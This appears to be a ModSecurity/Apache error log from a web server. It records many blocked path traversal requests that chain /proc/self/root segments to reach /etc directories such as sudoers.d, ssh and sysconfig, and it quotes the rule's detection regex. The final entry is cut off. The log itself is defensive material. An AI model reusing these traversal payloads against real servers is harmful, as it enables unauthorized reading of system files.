[Wed Mar 18 06:45:58.659168 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:55626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Vsdf6f5d65gmYZSnygAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:02.172039 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:58996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0WkzinOy1jxa1j4foCgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:06.736939 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:59012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0XimAPhZkrhU8w4lDFQAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:12.634138 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:59024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0ZCmAPhZkrhU8w4lDIQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:13.944131 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:37206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0ZSmAPhZkrhU8w4lDJgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:19.612858 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:37218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0a-oXxyEfFpUF8f9CDQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:20.925264 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:37668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0bNa6ubjKNq_cu4ZrUAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:35.332971 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:37672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0ewkwaGbbGflqUZDl8QAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:36.188198 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:40948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0fOw_le52K8_3pV210wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 06:46:36.704924 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:42308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0fOyqAr6etmhZHNqQ2gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:39.119038 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:42314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0f-yqAr6etmhZHNqQ3gAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:39.625698 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:54278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0f9a6ubjKNq_cu4ZrVwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:46:40.405887 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:50630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0gPu8EFLIOrSqIpvaZwAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:41.723122 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:50642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0gQkwaGbbGflqUZDl9wAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:43.000070 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:50654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0gta6ubjKNq_cu4ZrWAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:43.143980 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:54280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0g0zinOy1jxa1j4foGAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:44.295515 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:50660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0hOw_le52K8_3pV211gAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:44.455155 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:54294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0hOoXxyEfFpUF8f9CHAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:45.695108 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:50666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0heoXxyEfFpUF8f9CHQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:47.193572 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:50674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0h-w_le52K8_3pV211wAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:48.524291 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:50688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0iOyqAr6etmhZHNqQ4AAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:49.838607 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:41808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0iQkwaGbbGflqUZDmBAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:46:51.178128 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:41812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 